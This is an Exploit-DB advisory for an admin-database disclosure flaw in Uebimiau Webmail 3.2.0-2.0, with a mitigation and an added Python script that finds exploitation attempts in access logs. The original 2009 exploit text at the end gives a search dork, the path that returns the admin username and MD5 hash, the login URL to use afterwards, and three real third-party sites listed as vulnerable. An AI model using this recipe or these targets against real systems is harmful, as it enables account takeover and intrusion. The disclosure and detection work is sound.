Vendor: Webmail
By: Septemb0x
CVSS: 4.3 (MEDIUM)
Title: Arbitrary Admins Database Disclosure Vulnerability
CWE: 200
Product Name: Webmail
Affected Version From: 3.2.0-2.0
Affected Version To: 3.2.0-2.0
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Published: 2009

Uebimiau Webmail v3.2.0-2.0

Uebimiau Webmail v3.2.0-2.0 is vulnerable to arbitrary disclosure of its admin database. The admin credentials file at '/inc/database/system_admin/admin.ucf' is served directly by the web server, so a plain GET request to that path returns the admin username together with the MD5 hash of the password. An attacker can then use those credentials to log in to the admin panel at '/admin/login.php'.

Mitigation:

Ensure that the application does not expose sensitive information such as credentials, whether in plaintext or as MD5 hashes, through web-accessible files such as admin.ucf.
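As an added defender-side example (not part of the Exploit-DB record), the following Python scans Apache combined-format access logs for requests into the UebiMiau data directory, marks those where admin.ucf was actually served with a 200, and then correlates the requesting IPs with later hits on the admin login page. The log lines, IP addresses and installation paths are constructed for the example.

```python
import re

# Constructed sample access-log lines (Apache combined format); IPs and paths are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [24/Aug/2009:10:12:01 +0000] "GET /webmail/inc/database/system_admin/admin.ucf HTTP/1.1" 200 143 "-" "Mozilla/5.0"
203.0.113.5 - - [24/Aug/2009:10:12:09 +0000] "POST /webmail/admin/login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.7 - - [24/Aug/2009:10:15:22 +0000] "GET /webmail/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.9 - - [24/Aug/2009:10:16:40 +0000] "GET /mail/inc/database/system_admin/admin.ucf HTTP/1.1" 403 199 "-" "curl/7.19"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+)[^"]*" (?P<status>\d{3})')
DATA_DIR_RE = re.compile(r"/inc/database/", re.IGNORECASE)  # the whole UebiMiau data directory
ADMIN_DB_RE = re.compile(r"/inc/database/system_admin/admin\.ucf$", re.IGNORECASE)
ADMIN_LOGIN_RE = re.compile(r"/admin/login\.php$", re.IGNORECASE)


def parse_line(line):
    """Return (ip, path, status) for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return m["ip"], m["target"].split("?", 1)[0], int(m["status"])  # drop any query string


def find_data_dir_requests(log_text):
    """Flag every request into the data directory. 'disclosed' is True only when admin.ucf
    itself was served with 200, i.e. the admin hash actually left the server; 403 = blocked."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and DATA_DIR_RE.search(rec[1]):
            ip, path, status = rec
            disclosed = status == 200 and bool(ADMIN_DB_RE.search(path))
            hits.append({"ip": ip, "path": path, "status": status, "disclosed": disclosed})
    return hits


def ips_with_login_after_disclosure(log_text):
    """IPs that fetched admin.ucf successfully and afterwards touched the admin login page."""
    disclosed, suspects = set(), set()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, path, status = rec
        if status == 200 and ADMIN_DB_RE.search(path):
            disclosed.add(ip)
        elif ip in disclosed and ADMIN_LOGIN_RE.search(path):
            suspects.add(ip)
    return suspects
```

A 403 on admin.ucf shows the web server is already denying the data directory; a 200 means the admin hash was handed out and the admin password should be treated as compromised.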
Source: Exploit-DB raw data

##################################################
[+]Script Name : Uebimiau Webmail v3.2.0-2.0
[+]Bug Type : Arbitrary Admins Database Disclosure Vulnerability
[+]D0rk : "Uebimiau Webmail v3.2.0-2.0"
[+]Author : Septemb0x
[+]Greetz : BHDR & BARCOD3 & MUHADRAM  - Thanks : www.gonulerleri.org
[+]Note :  I wish the whole Muslim community a blessed Ramadan...
##################################################
[+]Examples :
 
1.  http://ifcacareer.com/mail/inc/database/system_admin/admin.ucf
2.  http://krunt.org/webmail/inc/database/system_admin/admin.ucf
3.  http://www.hostsalive.com/webmail/inc/database/system_admin/admin.ucf
##################################################
[+]EXPLOIT ; http://[Target]/[path]/inc/database/system_admin/admin.ucf
[+]GET ; username:password(md5)
[+]LOGIN ; http://[Target]/[path]/admin/login.php
##################################################

# milw0rm.com [2009-08-24]